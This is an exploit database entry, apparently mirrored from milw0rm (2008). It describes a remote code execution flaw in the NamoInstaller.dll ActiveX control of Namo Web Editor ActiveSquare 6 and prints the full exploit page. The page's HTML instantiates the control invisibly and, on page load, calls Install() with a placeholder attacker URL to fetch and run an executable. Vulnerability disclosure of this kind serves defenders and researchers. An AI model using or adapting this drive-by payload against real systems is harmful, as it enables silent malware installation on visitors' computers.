Namo Web Editor NamoInstaller.dll install Method Exploit

vendor:

Namo Web Editor ActiveSquare 6

by:

milw0rm.com

9.3

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Namo Web Editor ActiveSquare 6

Affected Version From: Namo Web Editor ActiveSquare 6

Affected Version To: Namo Web Editor ActiveSquare 6

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2008

Namo Web Editor NamoInstaller.dll install Method Exploit

A vulnerability exists in Namo Web Editor ActiveSquare 6 NamoInstaller.dll which allows remote attackers to execute arbitrary code. The vulnerability is due to a design error when handling the Install() method of the ActiveX control. By using the Install() method, a remote attacker can execute arbitrary code on the vulnerable system.

Mitigation:

No known mitigation or remediation for this vulnerability.

Source

Exploit-DB raw data:

<!-- 
Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit

Written by http://www.Plan-S.cn
Tested on Windows XP SP2(fully patched) Korean, IE6, NamoInstaller.dll version 3,0,0,1 
-->



<html>
 <head>
<html>
 <head>
  <title>Namo Web Editor NamoInstaller.dll install Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() 
   {
     	 obj.Install("http://ATTACKER.COM/HACK.EXE")           
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:AF465549-1D22-4140-A273-386FA8877E0A" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

tml>

-->

# milw0rm.com [2008-01-25]